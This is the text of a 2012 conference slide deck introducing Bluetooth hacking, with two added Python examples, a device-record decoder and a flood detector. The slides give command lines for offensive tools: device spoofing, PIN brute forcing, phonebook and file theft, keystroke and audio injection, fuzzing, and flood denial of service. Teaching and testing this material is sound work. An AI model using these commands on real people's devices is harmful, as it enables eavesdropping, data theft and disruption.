JP Dunning (.ronin) CarolinaCon 8 March 11-13, 2012 An Introduction to Bluetooth Hacking


Page 1: IntroToBluetoothHacking_CarolinaCon2012

JP Dunning (.ronin)

CarolinaCon 8

March 11-13, 2012

An Introduction to Bluetooth Hacking

Page 2

Bluetooth

● IEEE 802.15.1
● Released 1999
● Version 1.0 first release
● Standards controlled by Bluetooth SIG
● Low Power / Low Data Rate / Short Range
● Ideal for use in place of USB, PS/2, Serial, Audio Cables, etc.
● Included in Billions of Devices
● Many of them portable or embedded

Page 3

Bluetooth Versions

Version  Released  Updated Features
1.0      1999      Initial release
1.1      2001      Unencrypted options
1.2      2003      FHSS, Rate 721 Kbps
2.0      2004      Rate 2.1 Mbps
2.1      2007      Improved Security
3.0      2009      AMP adds 24 Mbps rate, 802.11 transport
4.0      2010      Low Power, Redefining Protocols

Page 4

Topology

● Star network topology
● Ad-Hoc (Piconet)
● Master / Slave
● Master controls the network
  – Sets things like clock cycles
● Master can have up to 7 slave devices
● Slave can only have one Master
● Either device can initiate pairing

Page 5

Security

● Authentication
  – Initial pairing with a PassKey
  – Further authentication with Link Key
● Encryption
  – Traffic encrypted during transit
● Authorization
  – Varying levels of Trust

Page 6

Linux Bluetooth Basics

● BlueZ Bluetooth Stack
● Recommend compiling from source with flags to install additional services
● Some of the Tools
  – hciconfig - Configure interface settings
  – hcitool - Configure connections
  – bluetoothd - Bluetooth Daemon
  – sdptool - Service discovery
  – simple-agent - Pairing

Page 7

Equipment

● Adapter
  – Parani UD100
● Antenna
  – Use the same antenna equipment as Wi-Fi
● Chipset
  – Cambridge Silicon Radio (CSR)
● Version
  – Version 2.1 (3.0 and 4.0 starting to come out)

Page 8

Scanning

● Scan for devices in Discoverable Mode
  – Device listens for remote Inquiries
  – Device not listening will not respond to scans

# hcitool -i hci0 scan --flush --class

BD Address: E0:F8:47:4D:5E:6F [mode 1, clkoffset 0x5585]

Device name: Bob's Laptop [cached]

Device class: Computer, Laptop (0x3a010c)

Page 9

Access Profile

● Device Address: unique identifier
  – Example: 00:11:22:33:44:55
● Class of Device (CoD): 24-bit value
  – Services: Identifies types of services
  – Major Device Class: High level of device
  – Minor Device Class: More granular
● Device Name: Human readable identifier
  – Example: “Motorola Headset”
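The three identity fields on this slide, decoded from the hcitool scan record on the Scanning slide, with the BD_ADDR also split into the NAP/UAP/LAP parts that matter later for finding non-discoverable devices. This is an added example, not code from the talk or from BlueZ; the sample record is constructed to match the slide's output, the CoD bit layout follows the Bluetooth Class of Device format (format type 0: minor class in bits 2-7, major class in bits 8-12, service flags in bits 13-23), and the class-name tables are abbreviated to what the example needs.

```python
# Added example (not from the talk or BlueZ): decode an `hcitool scan --class`
# record into the identity fields the slide lists. The sample record is
# constructed to match the slide; the CoD layout is the Bluetooth Class of
# Device format (format type 0) from the assigned numbers.
import re
from dataclasses import dataclass, field

# Service class flags live in bits 13-23 of the 24-bit CoD.
SERVICE_BITS = {
    13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
    18: "Rendering", 19: "Capturing", 20: "Object Transfer", 21: "Audio",
    22: "Telephony", 23: "Information",
}

# Major device class is bits 8-12.
MAJOR_CLASSES = {
    0: "Miscellaneous", 1: "Computer", 2: "Phone", 3: "LAN/Network Access Point",
    4: "Audio/Video", 5: "Peripheral", 6: "Imaging", 7: "Wearable", 8: "Toy",
    9: "Health", 31: "Uncategorized",
}

# Minor device class is bits 2-7; only the majors this example needs are decoded.
MINOR_CLASSES = {
    1: {1: "Desktop", 2: "Server", 3: "Laptop", 4: "Handheld PC/PDA",
        5: "Palm-size PC/PDA", 6: "Wearable computer"},
    2: {1: "Cellular", 2: "Cordless", 3: "Smartphone",
        4: "Wired modem or voice gateway", 5: "Common ISDN access"},
}


@dataclass
class BtIdentity:
    address: str
    name: str
    cod: int
    nap: str = ""          # upper 16 bits of BD_ADDR
    uap: str = ""          # next 8 bits
    lap: str = ""          # lower 24 bits (the part recoverable over the air)
    services: list = field(default_factory=list)
    major: str = ""
    minor: str = ""


def split_address(bdaddr):
    """Split a BD_ADDR string into (NAP, UAP, LAP) hex strings."""
    octets = bdaddr.upper().split(":")
    if len(octets) != 6 or not all(re.fullmatch(r"[0-9A-F]{2}", o) for o in octets):
        raise ValueError(f"malformed BD_ADDR: {bdaddr}")
    return "".join(octets[:2]), octets[2], "".join(octets[3:])


def decode_cod(cod):
    """Return (service names, major class, minor class) for a format-type-0 CoD."""
    if cod & 0x3:
        raise ValueError(f"unsupported CoD format type in {cod:#x}")
    minor_num = (cod >> 2) & 0x3F
    major_num = (cod >> 8) & 0x1F
    services = [name for bit, name in SERVICE_BITS.items() if cod & (1 << bit)]
    major = MAJOR_CLASSES.get(major_num, f"Reserved ({major_num})")
    minor = MINOR_CLASSES.get(major_num, {}).get(minor_num, f"minor {minor_num}")
    return services, major, minor


def parse_scan_record(text):
    """Parse one device record as printed by `hcitool scan --class`."""
    addr = re.search(r"BD Address:\s*([0-9A-Fa-f:]{17})", text)
    name = re.search(r"Device name:\s*(.*?)(?:\s*\[cached\])?\s*$", text, re.M)
    cod = re.search(r"Device class:.*\((0x[0-9A-Fa-f]+)\)", text)
    if not (addr and name and cod):
        raise ValueError("incomplete scan record")
    ident = BtIdentity(addr.group(1).upper(), name.group(1), int(cod.group(1), 16))
    ident.nap, ident.uap, ident.lap = split_address(ident.address)
    ident.services, ident.major, ident.minor = decode_cod(ident.cod)
    return ident


# Constructed sample: the record shown on the Scanning slide.
SAMPLE_RECORD = """\
BD Address: E0:F8:47:4D:5E:6F [mode 1, clkoffset 0x5585]
Device name: Bob's Laptop [cached]
Device class: Computer, Laptop (0x3a010c)
"""

if __name__ == "__main__":
    dev = parse_scan_record(SAMPLE_RECORD)
    print(f"{dev.address}  NAP={dev.nap} UAP={dev.uap} LAP={dev.lap}")
    print(f"{dev.name!r}: {dev.major} / {dev.minor}; services: {', '.join(dev.services)}")
    # The Kismet record on the War-Nibbling slide carries class 0x30040.
    print(decode_cod(0x30040))
```

Decoding 0x3a010c this way gives major class Computer, minor class Laptop and the service flags Networking, Capturing, Object Transfer and Audio, which is why the slide's output line reads "Computer, Laptop". The same decoder applied to the Kismet record's 0x30040 yields Positioning and Networking with a Miscellaneous major class, consistent with a GPS unit.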

Page 10

Spoofing

● Bluetooth Profile:
  – Device Address, Device Class, Device Name
● Bluetooth Profile Cloning:
  – Modify host Bluetooth Adapter profile to match the profile of another device
● Bluetooth Profile Spoofing:
  – Creating a misleading profile of host Bluetooth Adapter

Page 11

SpoofTooph

● Scan local area for devices
● Save list of devices found
● Select a device from the list to clone

# spooftooph -i hci0 -s -w scan.log

Page 12

SpoofTooph

Page 13

War-Nibbling

● Kismet has Bluetooth btscan plugin

Page 14

War-Nibbling

BT Device 1: BDADDR 00:05:4F:00:00:00

 Class      : 0x30040

 Name       : StreetPilot c550

 Seen       : 1

 Manuf      : Private

 First      : Thu May 10 16:07:50 2012

 Last       : Thu May 10 16:07:50 2012

 Min Pos    : Lat 35.997002 Lon -78.909752 Alt 129.585999 Spd 0.000000

 Max Pos    : Lat 35.997002 Lon -78.909752 Alt 129.585999 Spd 0.000000

 Avg Pos    : AvgLat 35.997002 AvgLon -78.909752 AvgAlt 129.585900

Page 15

War-Nibbling

Page 16

War-Nibbling

Page 17

War-Nibbling

Page 18

Service Discovery

● Service Discovery Protocol (SDP)
● Lists available services on device
  – Service name
  – L2CAP “port”
  – RFCOMM “port”
● Generally available without authentication

Page 19

Service Discovery

# sdptool -i hci0 browse xx:xx:xx:xx:xx:xx
...
Service Name: File Transfer server
Service RecHandle: 0x10000
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 10
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX File Transfer" (0x1106)
    Version: 0x0100

Page 20

Port Scan

● Find open ports with listening services
● Similar to NMAP
● psm_scan
  – Scan open L2CAP “ports”

# psm_scan -i hci0 -s 1 -e 101 xx:xx:xx:xx:xx:xx

● rfcomm_scan
  – Scan open RFCOMM “ports”

# rfcomm_scan -i hci0 -s 1 -e 30 xx:xx:xx:xx:xx:xx

Page 21

CavitySearch

● *Tool Release*
● Streamline the info gathering process
● Conduct recon for HCI Info, SDP, L2CAP, and RFCOMM
● Aggregate into a single log file

Page 22

CavitySearch

# cavitysearch hci0 11:22:33:44:55:66

Gathering device info into 11_22_33_44_55_66/hciinfo.log ...

Gathering device scan into 11_22_33_44_55_66/scan.log ...

Gathering SDP into 11_22_33_44_55_66/sdp.log ...

Gathering PSMs 1 - 101 into 11_22_33_44_55_66/psm.log ...

Gathering RFCOMMs 1 - 30 into 11_22_33_44_55_66/rfcomm.log ...

Generating profile in 11_22_33_44_55_66/profile.log ...

Logs saved in 11_22_33_44_55_66/ directory.

...done.

Page 23

Bluetooth Identity

Bluetooth Class
● Type of Device
  – Assist in determining physical device
● List Services
  – Networking, Telephony, & Object Transfer

Bluetooth Name
● Use human name for Social Engineering
● Use model name to determine possible attack vectors

Bluetooth Address
● Devices are assigned addresses in blocks
● The same models are within a limited range

Page 24

Bluetooth Profiling Project

● Bluetooth Profiling Project (BlueProPro)
● Collect Device Name, Device Address and Device Class on as many devices as possible
● Same idea as Josh Wright's Bnap, Bnap, but collecting device profiles from other devices instead
● Collected over 1,500 device profiles so far
● 1,000 profiles posted as of 07/29/2010

Page 25

Bluetooth Profiling Project

Percentage of device names which disclosed sensitive information (out of the 1,500 profiles collected)

First Name          28.17%
Last Name           18.76%
Location             1.30%
Device Model        70.54%
Nickname / Handle    1.51%

Page 26

Sniffing

HCIDump
● Similar to TCPDump to capture traffic on host

# hcidump -i hci0 -R -w btdump.cap

Wireshark
● View and examine capture

# wireshark -r btdump.cap

Page 27

Wireshark

Page 28

Ubertooth

Kismet
● Capture portions of Bluetooth traffic
● Find Bluetooth devices in local area

Bluetooth_RXTX
● Find Bluetooth devices in local area
● Brute force UAP portion of Device Address

Specan
● Spectrum analysis

Page 29

Ubertooth

Page 30

Ubertooth

Page 31

Find Non-Discoverable

● Previous Contact
  – Have prior knowledge of the Device Address
● Labels
  – Some devices print the Device Address on the box or casing
● Redfang
  – Scans 2^48 (2^32) possible Device Addresses
  – Takes years

Page 32

Find Non-Discoverable

● Only need LAP and UAP portions of the device address
● Ubertooth-lap extracts the LAP

# ubertooth-lap

● Ubertooth-uap calculates the UAP

# ubertooth-uap

Page 33

DEMO

Page 34

Pairing

● Guess PassKey
● Commonly PassKeys are 4 digits
  – Best chances: 0000, 1234, 9999

# simple-agent hci0 xx:xx:xx:xx:xx:xx
RequestPinCode (/org/bluez/2/hci0/dev_xx_xx_xx_xx_xx_xx)
Enter PIN Code:

Page 35

Pairing

● Trick User by changing the profile to one the user recognizes
● Post signs requesting connections as advertising or local information

Page 36

Pairing

● Chomp
  – Bluetooth specification attempts to counteract brute force
  – Attempts different PassKeys
  – Changes Device Address between attempts
  – Provide a file with possible PassKeys

# chomp xx:xx:xx:xx:xx:xx passkeys

Page 37

Common Services

● File Transfer Profile (FTP)
● Object Push Profile (OPP)
● Human Interface Device (HID)
● Hands Free (HF)
● Personal Area Network (PAN)

Page 38

OPP

● Specific files like phonebooks and calendars
● Bluebugger
  – dump phonebook

# bluebugger -c 3 -a xx:xx:xx:xx:xx:xx phonebook

● Specific tools
  – Bluesnarfer, btxml, btobex, bloover, helomoto

Page 39

FTP

● FTP facilitates exchanging files
● Obexfs mounts a remote folder over FTP
● Interact as if files are stored locally

# mkdir btdir

# obexfs -b xx:xx:xx:xx:xx:xx -c 3 btdir/

# ls btdir

Passwords.xls Taxes.pdf

Page 40

HID

● HID is used for various types of human interface devices such as mice and keyboards.
● Inject keystrokes by acting as a keyboard
● Stuffkeys
  – Keystrokes hard coded
  – Default: “who controls your keystrokes?”

# stuffkeys -a xx:xx:xx:xx:xx:xx -b yy:yy:yy:yy:yy:yy

Page 41

HF

● Inject and receive audio
● Carwhisperer

# hciconfig hci0 voice 0x0060

# carwhisperer -i hci0 in.raw out.raw 4

● HSTest

# hstest record in.raw xx:xx:xx:xx:xx:xx 4

Page 42

PAN

● Creates a TCP/IP network over Bluetooth
● Interact like it is WiFi or Ethernet

# pand --connect xx:xx:xx:xx:xx:xx --persist --encrypt --role=PANU

# ifconfig

...

pan0      Link encap:Ethernet  HWaddr yy:yy:yy:yy:yy:yy

...

Page 43

Fuzzing

● Bluetooth Stack Smasher
  – Fuzz L2CAP packets
  – Attempts to crash Bluetooth Stack
  – Generates code for suspected crashes
  – Takes about half an hour to run

# bss -i hci0 -s 100 -m 12 -M 0 xx:xx:xx:xx:xx:xx

Page 44

vCards

● Virtual Business Card
  – Adds information to contacts
● BlueJacking
  – Sending messages by vCard
  – Set the name field to the message
● Nasty vCard
  – Send a malformed vCard

# ussp-push xx:xx:xx:xx:xx:xx nasty.vcf bob.vcf

Page 45

DoS

● L2Ping Flood
  – Send a constant flood of ping packets

# l2ping -i hci0 -f xx:xx:xx:xx:xx:xx

● vCard Flood
  – Fill up address book with contacts

# vcblaster -c 100 -g xx:xx:xx:xx:xx:xx
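A monitoring-side counterpart to the two floods on this slide, added here as an example (not from the talk or from any BlueZ tool): a sliding-window rate check over per-event records, which is the kind of threshold a host watching its own HCI traffic would apply to tell an l2ping flood or a vCard flood from ordinary echo requests and pushes. The event tuples, BD_ADDR values and threshold numbers are constructed for the example; they are not hcidump output and the thresholds are illustrative rather than from any standard.

```python
# Added example (not from the talk): sliding-window rate detection for the two
# flood patterns on this slide. Events are (seconds, remote BD_ADDR, kind)
# tuples constructed for the example; thresholds are illustrative, not standard.
from collections import defaultdict, deque

# kind -> (max events allowed inside the window, window length in seconds)
THRESHOLDS = {
    "l2cap_echo_request": (50, 5.0),   # l2ping -f style echo stream
    "obex_push": (20, 60.0),           # vCard pushes filling an address book
}


def detect_floods(events, thresholds=THRESHOLDS):
    """Return {(addr, kind): time_first_exceeded} for every stream over its threshold.

    Events are processed in time order; each (addr, kind) keeps a deque of
    timestamps inside the trailing window, so memory is bounded by the window.
    """
    windows = defaultdict(deque)
    alerts = {}
    for t, addr, kind in sorted(events):
        if kind not in thresholds:
            continue                       # e.g. ordinary ACL traffic
        limit, span = thresholds[kind]
        window = windows[(addr, kind)]
        window.append(t)
        while window and t - window[0] > span:
            window.popleft()               # drop events older than the window
        if len(window) > limit and (addr, kind) not in alerts:
            alerts[(addr, kind)] = t
    return alerts


def build_sample_events():
    """Constructed capture: one echo flood, one benign l2ping, one vCard flood."""
    events = []
    # 60 echo requests in under 2 s from one address (flood)
    events += [(i * 0.03, "AA:BB:CC:00:00:01", "l2cap_echo_request") for i in range(60)]
    # 5 echo requests spread over a minute (a normal reachability check)
    events += [(i * 12.0, "AA:BB:CC:00:00:02", "l2cap_echo_request") for i in range(5)]
    # 30 vCard pushes in 9 s (address-book filling)
    events += [(100.0 + i * 0.3, "AA:BB:CC:00:00:03", "obex_push") for i in range(30)]
    # unrelated traffic that the check ignores
    events.append((50.0, "AA:BB:CC:00:00:02", "acl_data"))
    return events


SAMPLE_EVENTS = build_sample_events()

if __name__ == "__main__":
    for (addr, kind), t in detect_floods(SAMPLE_EVENTS).items():
        print(f"{t:8.2f}s  {addr}  {kind} rate exceeded")
```

On the constructed sample only the two flooding addresses are reported; the address sending five echoes over a minute stays under the limit, and the alert is keyed per (address, kind) so a single chatty peer is reported once rather than on every packet.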

Page 46

PwnTooth

● Bundle of Bluetooth attack tools
● Designed to automate multiple attacks against multiple targets.
● If a device address is detected in multiple iterations of scans, the attacks listed in the config file are only run the first time

# pwntooth -l logfile.txt -s 10

Page 47

PwnTooth

Page 48

DEMO

Page 49

Recap

● Setup
  – Configure interface
● Recon
  – Gather information on device and services
● Connect
  – Authenticate or connect to open services
● Interact
  – Access resources
● Attack
  – Test reliability through fuzzing and DoS

Page 50

Q&A

JP Dunning
Twitter: r0wnin
Email: ronin <At> shadowcave <d0t> org
Web: www.hackfromacave.com